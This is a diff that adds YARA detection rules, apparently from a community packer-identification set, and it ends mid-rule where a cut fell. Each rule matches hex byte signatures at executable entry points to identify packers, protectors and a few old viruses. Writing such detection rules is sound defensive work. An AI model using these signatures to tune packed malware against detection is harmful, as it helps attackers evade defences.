+rule ExeShieldvxx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 65 78 65 73 68 6C 2E 64 6C 6C C0 5D 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptorv20Vaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { F7 D1 83 F1 FF 6A 00 F7 D1 83 F1 FF 81 04 24 ?? 02 00 00 F7 D1 83 F1 FF 59 BA 32 21 ?? 00 F7 D1 83 F1 FF F7 D1 83 F1 FF 80 02 E3 F7 D1 83 F1 FF C0 0A 05 F7 D1 83 F1 FF 80 02 6F F7 D1 83 F1 FF 80 32 A4 F7 D1 83 F1 FF 80 02 2D F7 D1 83 F1 FF 42 49 85 C9 75 CD 1C 4F 8D 5B FD 62 1E 1C 4F 8D 5B FD 4D 9D B9 ?? ?? ?? 1E 1C 4F 8D 5B FD 22 1C 4F 8D 5B FD 8E A2 B9 B9 E2 83 DB E2 E5 4D CD 1E BF 60 AB 1F 4D DB 1E 1E 3D 1E 92 1B 8E DC 7D EC A4 E2 4D E5 20 C6 CC B2 8E EC 2D 7D DC 1C 4F 8D 5B FD 83 56 8E E0 3A 7D D0 8E 9D 6E 7D D6 4D 25 06 C2 AB 20 CC 3A 4D 2D 9D 6B 0B 81 45 CC 18 4D 2D 1F A1 A1 6B C2 CC F7 E2 4D 2D 9E 8B 8B CC DE 2E 2D F7 1E AB 7D 45 92 30 8E E6 B9 7D D6 8E 9D 27 DA FD FD 1E 1E 8E DF B8 7D CF 8E A3 4D 7D DC 1C 4F 8D 5B FD 33 D7 1E 1E 1E A6 0B 41 A1 A6 42 61 6B 41 6B 4C 45 1E 21 F6 26 BC E2 62 1E 62 1E 62 1E 23 63 59 ?? 1E 62 1E 62 1E 33 D7 1E 1E 1E 85 6B C2 41 AB C2 9F 23 6B C2 41 A1 1E C0 FD F0 FD 30 20 33 9E 1E 1E 1E 85 A2 0B 8B C2 27 41 EB A1 A2 C2 1E C0 FD F0 FD 30 62 1E 33 7E 1E 1E 1E C6 2D 42 AB 9F 23 6B C2 41 A1 1E C0 FD F0 FD 30 C0 FD F0 8E 1D 1C 4F 8D 5B FD E0 00 33 5E 1E 1E 1E BF 0B EC C2 E6 42 A2 C2 45 1E C0 FD F0 FD 30 CE 36 CC F2 1C 4F 8D 5B FD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv125
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 70 40 90 ?? 90 01 85 9E 70 40 BB ?? F3 0D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptorv1Vaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 58 90 50 90 8B 00 90 3C 50 90 58 0F 85 67 D6 EF 11 50 68 }
+	$a1 = { 90 58 90 50 90 8B 00 90 3C 50 90 58 0F 85 67 D6 EF 11 50 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PECompactv122
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 ?? 70 40 ?? 90 90 01 85 9E 70 40 ?? BB F3 08 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Packmanv10BrandonLaCombe
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5B 8D 5B C6 01 1B 8B 13 8D 73 14 6A 08 59 01 16 AD 49 75 FA 8B E8 C6 06 E9 8B 43 0C 89 46 01 6A 04 68 00 10 00 00 FF 73 08 51 FF 55 08 8B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SpecialEXEPaswordProtectorV101EngPavolCerven
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 89 AD 8C 01 00 00 8B C5 2B 85 FE 75 00 00 89 85 3E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeSmashervxx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C FE 03 ?? 60 BE ?? ?? 41 ?? 8D BE ?? 10 FF FF 57 83 CD FF EB 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEArmor046ChinaCrackingGroup
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 AA 00 00 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 3D ?? ?? 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B ?? ?? 00 5C ?? ?? 00 6F ?? ?? 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VMProtect106107PolyTech
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 68 00 00 00 00 8B 74 24 28 BF ?? ?? ?? ?? FC 89 F3 03 34 24 AC 00 D8 }
+
+condition:
+		$a0
+}
+	
+	
+rule USSR031bySpirit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5D 83 C5 12 55 C3 20 83 B8 ED 20 37 EF C6 B9 79 37 9E 8C C9 30 C9 E3 01 C3 BE 32 ?? ?? ?? B0 ?? 30 06 8A 06 46 81 FE 00 ?? ?? ?? 7C F3 }
+
+condition:
+		$a0
+}
+	
+	
+rule PeCompact253DLLSlimLoaderBitSumTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 32 00 00 08 0C 00 48 E1 01 56 57 53 55 8B 5C 24 1C 85 DB 0F 84 AB 21 E8 BD 0E E6 60 0D 0B 6B 65 72 6E 6C 33 32 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule LameCryptv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 66 9C BB ?? ?? ?? ?? 80 B3 00 10 40 00 90 4B 83 FB FF 75 F3 66 9D 61 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Cygwin32
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 04 83 3D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectv123RC4build0807exeAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule Armadillov210b2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 18 12 41 00 68 24 A0 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov190
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 10 F2 40 00 68 64 9A 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXPressorProtection150XCGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 EB 01 ?? ?? ?? ?? 83 EC 0C 53 56 57 EB 01 ?? 83 3D ?? ?? ?? ?? 00 74 08 EB 01 E9 E9 56 01 00 00 EB 02 E8 E9 C7 05 ?? ?? ?? ?? 01 00 00 00 EB 01 C2 E8 E2 05 00 00 EB 02 DA 9F 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? FF D0 59 59 EB 01 C8 EB 02 66 F0 68 ?? ?? ?? ?? E8 0E 05 00 00 59 EB 01 DD 83 65 F4 00 EB 07 8B 45 F4 40 89 45 F4 83 7D F4 61 73 1F EB 02 DA 1A 8B 45 F4 0F ?? ?? ?? ?? ?? ?? 33 45 F4 8B 4D F4 88 ?? ?? ?? ?? ?? EB 01 EB EB }
+
+condition:
+		$a0
+}
+	
+	
+rule VxNecropolis1963
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B4 30 CD 21 3C 03 ?? ?? B8 00 12 CD 2F 3C FF B8 ?? ?? ?? ?? B4 4A BB 40 01 CD 21 ?? ?? FA 0E 17 BC ?? ?? E8 ?? ?? FB A1 ?? ?? 0B C0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Shrinkv20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 ?? ?? 50 9C FC BE ?? ?? 8B FE 8C C8 05 ?? ?? 8E C0 06 57 B9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02UPX06Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PESpinV071cyberbob
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule XHider10GlobaL
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 EC 33 C0 89 45 EC B8 54 20 44 44 E8 DF F8 FF FF 33 C0 55 68 08 21 44 44 64 FF 30 64 89 20 8D 55 EC B8 1C 21 44 44 E8 E0 F9 FF FF 8B 55 EC B8 40 ?? ?? 44 E8 8B F5 FF FF 6A 00 6A 00 6A 02 6A 00 6A 01 68 00 00 00 40 A1 40 ?? ?? 44 E8 7E F6 FF FF 50 E8 4C F9 FF FF 6A 00 50 E8 4C F9 FF FF A3 28 ?? ?? 44 E8 CE FE FF FF 33 C0 5A 59 59 64 89 10 68 0F 21 44 44 8D 45 EC E8 F1 F4 FF FF C3 E9 BB F2 FF FF EB F0 E8 FC F3 FF FF FF FF FF FF 0E 00 00 00 63 3A 5C 30 30 30 30 30 30 31 2E 64 61 74 00 }
+	$a1 = { 85 D2 74 23 8B 4A F8 41 7F 1A 50 52 8B 42 FC E8 30 00 00 00 89 C2 58 52 8B 48 FC E8 48 FB FF FF 5A 58 EB 03 FF 42 F8 87 10 85 D2 74 13 8B 4A F8 49 7C 0D FF 4A F8 75 08 8D 42 F8 E8 5C FA FF FF C3 8D 40 00 85 C0 7E 24 50 83 C0 0A 83 E0 FE 50 E8 2F FA FF FF 5A 66 C7 44 02 FE 00 00 83 C0 08 5A 89 50 FC C7 40 F8 01 00 00 00 C3 31 C0 C3 90 }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule PseudoSigner01MicrosoftVisualC70DLLAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8D 6C 01 00 81 EC 00 00 00 00 8B 45 90 83 F8 01 56 0F 84 00 00 00 00 85 C0 0F 84 ?? ?? ?? ?? E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEShieldV05Smoke
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D 81 ED BC 1A 40 00 EB 01 00 8D B5 46 1B 40 00 BA B3 0A 00 00 EB 01 00 8D 8D F9 25 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 }
+	$a1 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D 81 ED BC 1A 40 00 EB 01 00 8D B5 46 1B 40 00 BA B3 0A 00 00 EB 01 00 8D 8D F9 25 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 50 C3 8A 06 46 EB 01 00 D0 C8 E8 14 00 00 00 83 EB 01 00 2A C2 E8 00 00 00 00 5B 83 C3 07 53 C3 00 EB 04 5B 43 53 C3 EB 01 00 32 C2 E8 0B 00 00 00 00 32 C1 EB 01 00 C0 C0 02 EB 09 2A C2 5B EB 01 00 43 53 C3 88 07 EB 01 00 47 4A 75 B4 90 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule UnnamedScrambler25Ap0ke
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B9 0B 00 00 00 6A 00 6A 00 49 75 F9 51 53 56 57 B8 6C 3E 40 00 E8 F7 EA FF FF 33 C0 55 68 60 44 40 00 64 FF 30 64 89 20 BA 70 44 40 00 B8 B8 6C 40 00 E8 62 F3 FF FF 8B D8 85 DB 75 07 6A 00 E8 A1 EB FF FF BA E8 64 40 00 8B C3 8B 0D B8 6C 40 00 E8 37 D3 FF FF C7 05 BC 6C 40 00 0A 00 00 00 BB 68 6C 40 00 BE 90 6C 40 00 BF E8 64 40 00 B8 C0 6C 40 00 BA 04 00 00 00 E8 07 EC FF FF 83 3B 00 74 04 33 C0 89 03 8B D7 8B C6 E8 09 F3 FF FF 89 03 83 3B 00 0F 84 BB 04 00 00 B8 C0 6C 40 00 8B 16 E8 06 E2 FF FF B8 C0 6C 40 00 E8 24 E1 FF FF 8B D0 8B 03 8B 0E E8 D1 D2 FF FF 8B C7 A3 20 6E 40 00 8D 55 EC 33 C0 E8 0C D4 FF FF 8B 45 EC B9 1C 6E 40 00 BA 18 6E 40 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule Armadillov177
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 B0 71 40 00 68 6C 37 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxTrivial25
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B4 4E FE C6 CD 21 B8 ?? 3D BA ?? 00 CD 21 93 B4 40 CD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+// 20150909 - Issue #39 - Commented because of High FP rate
+/*
+rule Armadillov171
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+*/
+	
+rule KBySV022shoooo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? ?? ?? E8 01 00 00 00 C3 C3 11 55 07 8B EC B8 ?? ?? ?? ?? E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule InnoSetupModule
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 49 6E 6E 6F 53 65 74 75 70 4C 64 72 57 69 6E 64 6F 77 00 00 53 54 41 54 49 43 }
+	$a1 = { 55 8B EC 83 C4 ?? 53 56 57 33 C0 89 45 F0 89 45 ?? 89 45 ?? E8 ?? ?? FF FF E8 ?? ?? FF FF E8 ?? ?? FF FF E8 ?? ?? FF FF E8 ?? ?? FF FF }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule piritv15
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5B 24 55 50 44 FB 32 2E 31 5D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SoftSentryv30
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 EC ?? 53 56 57 E9 B0 06 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EncryptPEV22007411WFS
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 1B 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 54 65 6D 70 50 61 74 68 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov19x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 98 ?? ?? ?? 68 10 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov285
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 68 ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 28 ?? ?? ?? 33 D2 8A D4 89 15 24 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectvxx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 ?? ?? ?? ?? ?? 90 5D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 03 DD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeShieldv17
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 90 1F 06 00 C3 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Splasherv10v30
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 8B 44 24 24 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 50 E8 ED 02 ?? ?? 8C C0 0F 84 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeCryptor01build002GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B 04 24 40 90 83 C0 07 80 38 90 90 74 02 EB FF 90 68 27 ?? ?? 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 FF E4 90 8B 04 24 64 A3 00 00 00 00 8B 64 24 08 90 83 C4 08 }
+
+condition:
+		$a0
+}
+	
+	
+rule EXEShieldV06SMoKE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D 81 ED D4 1A 40 00 EB 01 00 8D B5 5E 1B 40 00 BA A1 0B 00 00 EB 01 00 8D 8D FF 26 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 }
+	$a1 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D 81 ED D4 1A 40 00 EB 01 00 8D B5 5E 1B 40 00 BA A1 0B 00 00 EB 01 00 8D 8D FF 26 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 50 C3 8A 06 46 EB 01 00 D0 C8 E8 14 00 00 00 83 EB 01 00 2A C2 E8 00 00 00 00 5B 83 C3 07 53 C3 00 EB 04 5B 43 53 C3 EB 01 00 32 C2 E8 0B 00 00 00 00 32 C1 EB 01 00 C0 C0 02 EB 09 2A C2 5B EB 01 00 43 53 C3 88 07 EB 01 00 47 4A 75 B4 90 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02MicrosoftVisualBasic5060Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? ?? ?? E8 0A 00 00 00 00 00 00 00 00 00 30 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPack118DllLZMA430ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 7C 24 08 01 0F 85 ?? 01 00 00 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF E8 9F 01 00 00 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 95 AA 0A 00 00 89 85 F9 0A 00 00 EB 14 60 FF B5 F9 0A 00 00 FF 34 37 FF 74 37 04 FF D3 61 83 C7 08 83 3C 37 00 75 E6 83 BD 0D 0B 00 00 00 74 0E 83 BD 11 0B 00 00 00 74 05 E8 F6 01 00 00 8D 74 37 04 53 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 95 AA 0A 00 00 89 85 1D 0B 00 00 5B 60 FF B5 F9 0A 00 00 56 FF B5 1D 0B 00 00 FF D3 61 8B B5 1D 0B 00 00 8B C6 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PKLITEv100v103
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? BA ?? ?? 8C DB 03 D8 3B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Shrinkerv34
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 3D B4 ?? ?? ?? ?? 55 8B EC 56 57 75 6B 68 00 01 00 00 E8 ?? 0B 00 00 83 C4 04 8B 75 08 A3 B4 ?? ?? ?? 85 F6 74 23 83 7D 0C 03 77 1D 68 FF }
+	$a1 = { BB ?? ?? BA ?? ?? 81 C3 07 00 B8 40 B4 B1 04 D3 E8 03 C3 8C D9 49 8E C1 26 03 0E 03 00 2B }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule Shrinkerv32
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 3D ?? ?? ?? ?? ?? 55 8B EC 56 57 75 65 68 00 01 ?? ?? E8 ?? E6 FF FF 83 C4 04 8B 75 08 A3 ?? ?? ?? ?? 85 F6 74 1D 68 FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Shrinkerv33
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 3D ?? ?? ?? 00 00 55 8B EC 56 57 75 65 68 00 01 00 00 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01JDPack1xJDProtect09Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 22 00 00 00 5D 8B D5 81 ED 90 90 90 90 2B 95 90 90 90 90 81 EA 06 90 90 90 89 95 90 90 90 90 83 BD 45 00 01 00 01 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upack024027beta028alphaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 88 01 40 00 AD 8B F8 95 AD 91 F3 A5 AD B5 ?? F3 AB AD 50 97 51 58 8D 54 85 5C FF 16 72 57 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 E3 ?? B3 00 8D 1C 5B 8D 9C 9D 0C 10 00 00 B0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01LocklessIntroPackAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2C E8 EB 1A 90 90 5D 8B C5 81 ED F6 73 90 90 2B 85 90 90 90 90 83 E8 06 89 85 FF 01 EC AD E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov250b3
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 B8 ?? ?? ?? 68 F8 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 20 ?? ?? ?? 33 D2 8A D4 89 15 D0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEBundlev02v20x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB ?? ?? 40 ?? 87 DD 6A 04 68 ?? 10 ?? ?? 68 ?? 02 ?? ?? 6A ?? FF 95 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SoftProtectwwwsoftprotectbyru
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? C7 00 00 00 00 00 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 ?? ?? ?? ?? ?? 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NTPackerV2XErazerZ
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 4B 57 69 6E 64 6F 77 73 00 10 55 54 79 70 65 73 00 00 3F 75 6E 74 4D 61 69 6E 46 75 6E 63 74 69 6F 6E 73 00 00 47 75 6E 74 42 79 70 61 73 73 00 00 B7 61 50 4C 69 62 75 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule SiliconRealmsInstallStub
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? 92 40 00 68 ?? ?? 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 ?? ?? 40 00 33 D2 8A D4 89 15 ?? ?? 40 00 8B C8 81 E1 FF 00 00 00 89 0D ?? ?? 40 00 C1 E1 08 03 CA 89 0D ?? ?? 40 00 C1 E8 10 A3 }
+
+condition:
+		$a0
+}
+	
+	
+rule Armadillov430v440SiliconRealmsToolworks
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 40 ?? ?? 00 68 80 ?? ?? 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 88 ?? ?? 00 33 D2 8A D4 89 15 30 ?? ?? 00 8B C8 81 E1 FF 00 00 00 89 0D 2C ?? ?? 00 C1 E1 08 03 CA 89 0D 28 ?? ?? 00 C1 E8 10 A3 24 }
+	$a1 = { 60 E8 00 00 00 00 5D 50 51 0F CA F7 D2 9C F7 D2 0F CA EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 9D 0F C9 8B CA F7 D1 59 58 50 51 0F CA F7 D2 9C F7 D2 0F CA EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule MoleBoxv20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? ?? ?? 60 E8 4F }
+
+condition:
+		$a0
+}
+	
+	
+rule FucknJoyv10cUsAr
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED D8 05 40 00 FF 74 24 20 E8 8C 02 00 00 0B C0 0F 84 2C 01 00 00 89 85 6C 08 40 00 8D 85 2F 08 40 00 50 FF B5 6C 08 40 00 E8 EF 02 00 00 0B C0 0F 84 0C 01 00 00 89 85 3B 08 40 00 8D 85 3F 08 40 00 50 FF B5 6C 08 40 00 E8 CF 02 00 }
